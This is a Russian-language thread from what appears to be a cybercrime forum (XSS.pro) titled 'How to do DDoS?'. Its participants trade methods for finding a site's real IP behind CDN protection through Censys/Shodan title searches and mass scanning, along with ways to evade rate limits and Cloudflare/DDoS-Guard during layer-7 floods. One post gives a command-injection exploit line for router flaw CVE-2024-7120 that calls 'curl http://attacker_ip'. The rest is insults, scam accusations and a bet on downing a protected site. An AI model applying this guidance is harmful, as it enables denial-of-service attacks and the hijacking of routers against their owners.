-
XSS.stack #1 – первый литературный журнал от юзеров форума
Мануал/Книга Как проводить DDOS?
- Автор темы Wh1teCr0w
- Дата начала
-
- Теги
- ddos ddos attack
Парни, для тех кто желает попробовать дернуть backend ip какого либо сервиса и не терять кучу времени как наш многоуважаемый «Мафиози»! То вот вам один из вариантов. Заходим на сайт, console.log(document.title); ==> Выводим заголовок страницы в консоль. Заходим на search.censys.io ==> service.http.response.html_title: “ Ваш HTML title” . Вот один из самых простых способов что-то добыть для нубяр, принципе пойдет)))
Дружище, ты в курсе что свои сообщения можно редачить и добавлять все что считаешь нужным а не дрочить 50 ответов на один месседж? Ты или пиздец порвался (автоматический проигрыш спора) или сообщения набиваешь, одно из двух - без обид.
Премного извиняюсь за оффтоп
Ай не пизди уже.
Потому что это пиздежь, ни на каком слуху ни у кого я не хожу. Я работаю на постоянной основе всего лишь с несколькими людьми, которых можно по пальцам одной руки пересчитать. И нигде и никогда я себе регалий ни каких не приписывал.
Какое нахуй прошлое? Пол года назад это было, и после того как тебе статус кидалы выставили ты пришел снова на форум под ником btcblackclub и открыл новые топики с услугами по ддосу. Это пиздец днище ебаное. Хули ты тогда не закрыл блэк то сразу? зачем с новым акком пришел на форум? $120 это просто донный уровень.
У тебя в топике дословно было написано еще вчера: "Мы лучшее решение на рынке СНГ". Ты отредактировал топик вчера и убрал эту ебанину. То же самое у тебя написано в топике который ты сделал с мульта btcblackclub.
Ну если у тебя нет денег на сервер с хорошей конфигурацией и широким каналом специально под скан, это исключительно твоя проблема. На 10 гбит/с можно сканить очень быстро, например весь hetzner + ovh + digital ocean + contabo всего за 3 минуты. Когда меняют реалку, я нахожу ее максимум за час, а если она в той же AS то это 30 секунд максимум, при условии что внешние порты не закрыли для всего мира кроме подсетей cdn/антиддоса. И да, я считаю что у каждого кто занимается этой ебаторией должен быть скоростной сервер под скан, где на готове заряжен масскан и httpx.
Ахуенно, спасибо за лайфхак.
Последнее редактирование:
“Мы лучшее решение на снг рынке», у кого сейчас не написано подобного в теме? По поводу блека я просто не знал как закрыть по другому свой косяк и решил тупо новый акк создать)) как видишь закрыл, а ты тупо ноешь и все, вообще не понимаю тебя - ведь у тебя «свои клиенты». Да, я на 99% уверен что никто не будет искать ебаную реалку и сканить…Сейчас большинство ддосеров с соседних бордов используют тупо чужие стрессеры - это я точно знаю. Хоть за лайфхак спасибо написал!)
клаудфлейр недавно отбил мощнейший ддос в триллиарды терабайт в наносекунду погуглите, думаю такое было достигнуто китайцами которые на государственные деньги собрали ботнет из роутеров и т.д., я сам натыкался на уязвимые роутеры где php payload отправляешь file_get_contents() на свой айпи и получаешь запросы, притом странность роутеров что payload три раза выполняется и роутеров таких сотни если не тысячи
upd: код уязвимости если кому интересно CVE-2024-7120
и да, эксплуатируется проще простого url = f"{host}vpn/list_base_config.php?type=mod&parts=base_config&template=`curl http://attacker_ip`" (не file_get_contents, а curl использовал, можно любой shell выполнить в общем то)
upd: код уязвимости если кому интересно CVE-2024-7120
и да, эксплуатируется проще простого url = f"{host}vpn/list_base_config.php?type=mod&parts=base_config&template=`curl http://attacker_ip`" (не file_get_contents, а curl использовал, можно любой shell выполнить в общем то)
Последнее редактирование:
Какой даун вообще будет лить так в протект?)) Это фиксится рейтлимитом на 5 за 10 секунд, итог: веб сервер даже не напрягается, а юзеры не ощущают никаких проблем)
Ранд мега полезен в GET запросах и его не замитигировать.
Не неси х#йню, если не понимаешь ничего в л7 протекте.
Могу продать тебе кф биз на домен и поиграешься с ним)
После данного бреда уже понятно что сообщение мусор. Они в л4 скипают 90% атаки (любой нормальный метод), в качестве примера можешь юзануть Спектрум.
Как минимум парс прокси с серваков которые это делают. Никакой нормальный человек даже с паблик проксями не будет обновлять их мануально (в отличии от тебя, мануально обновляющего приват прокси, как я понял
)Ты ищешь бэк и льёшь в него, у тебя методы очевидно говно (как и повер в прочем) и ты король хттп ддоса, когда у меня он составляет целых 0% из 30 лямов реквестов (жесть много, да?)
Данный вывод был сделан из твоих знаний, а именно полный ноль и как раз соответствуют гайду. Очень посмеюсь ещё, если скажешь что атаки POST запросами лучше и тяжелее митигируются, чем GET запросами)
Закрывают за минуту после обнаружения что атачат в бэк, это дело секунды, скрипты для которого есть даже на гитхабе)
Либо также домен в ценсис, ведь похожих титлов может быть много. По титлу лучше искать в фофе/шодане.
Сожалею тебе,"тру ддосер", что ты работаешь онли по реалкам) Повер, подход и качество методов на глаза))
Извиняюсь что написал несколько ответов подряд и моментами повторяюсь, просто данный человек не поймёт ничего даже с третьего раза)
Последнее редактирование:
На глаза тебе насрали видимо, очередной
Я нигде не писал про мануальное обновление. Прокси сканятся и обновляются полностью автоматически. Про обновление руками ты видимо высрал лишь потому, что больше нихуя не придумал.Никакой нормальный человек даже с паблик проксями не будет обновлять их мануально (в отличии от тебя, мануально обновляющего приват прокси, как я понял
Снова попытка высрать хоть что-то, цепануть ни какой конкретикой не можешь, поэтому пытаешься лить хоть какую-то воду.
Пруфов об использовании сторонних апи так и не будет, ну не удивительно, очередной воздухан-пиздабол: напиздел, а по факту пруфов не будет.
Объясняю на пальцах: льем на /?page=%RANDN2%, где %RANDN2% означает генерацию двузначного рандомного числа. При условии что на таргете есть все страницы от 10 до 99, тебя тот же ддос-гвард начнет посылать нахуй уже через 30~120 секунд, с его рейт-лимитом и js крутилкой. Потому что ты ломишься на один и тот же патч, несмотря на генерацию чисел. А что бы ддг не детектил, нужно использовать большие интервалы между запросами, как минимум в 4 секунды, а желательно еще больше если позволяют ресурсы и бот не должен влетать влетать с двух ног на сайт, постепенно на протяжении 10-15 минут (а лучше больше) заходить небольшими группами.
Ну значит так, раз я нихуя не понимаю в л7 "протекте", работаю "онли по реалкам", а ты такой ахуительный загадочный мастер фломастер, то предлагаю тебе подтвердить свою квалификацию и показать как ты работаешь, не по реалкам. Я поднимаю сайт и настраиваю сервер, накрываю его ddg или пусть даже cloudflare с тарифом за $20, реалку ты не найдешь ни при каких обстоятельствах. Гео-блока не будет. Ты должен сутки удержать под атакой этот сайт, так, что-бы он не ожил более чем на 10 минут. Вносим по $10k на депозит, здесь на форуме, через админа заключаем пари. Если сайт пролежит сутки и не оживет более чем на 10 минут - забираешь все деньги, свои $10k и мои $10k. Если нихуя не сможешь - все бабки забираю я. Доступ к клоуду и серверу я выдам админу предварительно, что-бы он все это мог наблюдать. Давай, соглашайся, я же "тру ддосер" который нихуя ничего не смыслит ни в чем, по твоим же словам, поэтому на изи выиграешь пари. Или сейчас начнутся ахуительные истории с отмазами почему ты не будешь в этом участвовать?
А что ему еще делать? Чувак в натуре авторитеный, жизнь знает. Братва про него слышала.
А, вы же две сестрички оказывается. https://xss.pro/threads/124023/#post-874858 - какое совпадение, первое сообщение на форуме после регистрации и сразу отзыв в топике "лучшего в снг", который отлетал в блэк за $120. 
И здесь тоже вдвоем случайным образом оказались. Ну давайте чепухи, кто из вас пари примет о котором я написал? Вы же "топовые" ребята, все знаете, все умеете (нет). Или вас двоих снова надо на мульты проверять?
И здесь тоже вдвоем случайным образом оказались. Ну давайте чепухи, кто из вас пари примет о котором я написал? Вы же "топовые" ребята, все знаете, все умеете (нет). Или вас двоих снова надо на мульты проверять?Какое пари? Пиши еще раз, две сестрички, а может и не две сестрички - тебя это волновать не должно, ты же не команда форума. Иди проверяй на мульты умник которых у меня нету, а за него я не знаю. Ты очень жалкий, специально рыскал на форуме, нашел блек, нашел мульт, доебался за отзыв который сделан по факту и дальше плачешь!А, вы же две сестрички оказывается. https://xss.pro/threads/124023/#post-874858 - какое совпадение, первое сообщение на форуме после регистрации и сразу отзыв в топике "лучшего в снг", который отлетал в блэк за $120.
Неважно как будет устроена защита, вас это вообще волновать не должно, ведь я же ничего не понимаю в "л7 протекте", по словам твоей подружки. Пари нормальное, учитывая что вы здесь напиздели, ну значит показывайте, положите мой сайт на сутки, изи $10k для вас.
После моих фактов пошли оскорбления с твоей стороны, интересно...
Какую воду)), какая попытка цепануть и высрать что-то)
В данном предложении (которое ты процитировал) я сказал что ты говоришь о POST запросах, атаки которыми фиксятся и митигируются в сотни и тысячи раз легче, чем GET запросами (и даже сказал как, но повторюсь: рейтлимит на тот же логин (сам о нём упомянул) до 5 за 10сек и бан на определённый промежуток времени (стандартная функция кф) и даже объяснил почему он никак не заденет легитов)
Значит я придумал это с нихуя? Ладно))))
Что-то ты уже запутался, у тебя приватки или скан инета на общедоступные прокси?))
Никакой нормальный человек так ранд не юзает)
Расскажу небольшой секретик: ддг л7 без кастом настройки (которую в большинстве случаев делает поддержка) полный 0, также как и штормволл л4.
Если у тебя такие тупые костыли и совсем нету опыта, а тем более нормальных методов, сочувствую... Никогда не пробовал флудер с фулл легит хэдерами (+ немного ранда в некоторых моментах) хттп1 залить?) Он скипает всё без вопросов, хоть 24 часа держи
Твои мысли дают сразу понять что опыта у тебя в этом маловато, методы ты никогда не писал и не работаешь с ними (не настраиваешь под каждый таргет чтобы достичь максимальной производительности)
Боюсь предположить что те самые методы с гх о которых ты говорил (которые якобы юзает magically), юзаешь как раз ты) Потому что даже мне в голову не придёт смотреть на такое говно)
кф про шьётся (по крайней мере я шью) с байпассом 100%, бизнес уже по труднее, но также шьётся. Бизнес могу продать тебе за 100 долларов на лайфтайм)
К сожалению у меня таких бабок пока нет) А так согласился бы. Можно односторонне пари, если ты конечно не боишься))
Почему сестрички то?) Решил что он и я 1 и тот же человек?)))
Дополню:
Ничего по поводу его методов и повера я не услышал в ответ на мои сведения, по этому и смею предположить что человек сидит на чужих апишках, ведь он ничего не знает и не смыслит в данном деле (знания взял из гайда, ведь большинство, что он сказал - невалид на данный момент). В данном случае он, как продавец, должен доказывать что его продукт лучше и это действительно его продукт, а не "API монстр")
Сайт без рейтлимита и кастом рулов (только менеджед кф про и хттп ддос - то есть встроенный протект кф)?
Я согласен на одностороннее пари, ведь взамен ничего не могу предложить)
Если в ответ на мои сообщения опять покатятся необоснованные сообщения с целью оскорбить (как было ранее), то попрошу admin разобраться в данной ситуации (как минимум выдать предупреждение), ведь это начинает раздражать.
А как так получается, что у таких серьезных господ, которые лучшие в дудосе, все знают и все понимают, все подряд прошивают, нет свободных $10k? А у нас, которые нихуя ни в чем не понимают, эти деньги есть, и даже не жалко будет их проебать в этом пари. Как так получается то? Ну давай на $5k хотя бы? Если вы такие ахуенные, хули вы такие нищие все?
Чего ты к деньгам цепляешься?
Я уже сказал что согласен на односторонний спор, ведь как ты говоришь:
Раз они у тебя есть)
Ты х#йню несешь, какой нахуй одностронний? Схуяли я должен рисковать деньгами а ты нет? Ведь ты изначально сказал что я нихуя ни в чем не понимаю, и теперь отказываешься это доказать на деле рискнув бабками? Ну как это можно назвать не иначе как фуфломицином? Админа он завет, ты маме еще иди пожалуйста. Пиздец кринге.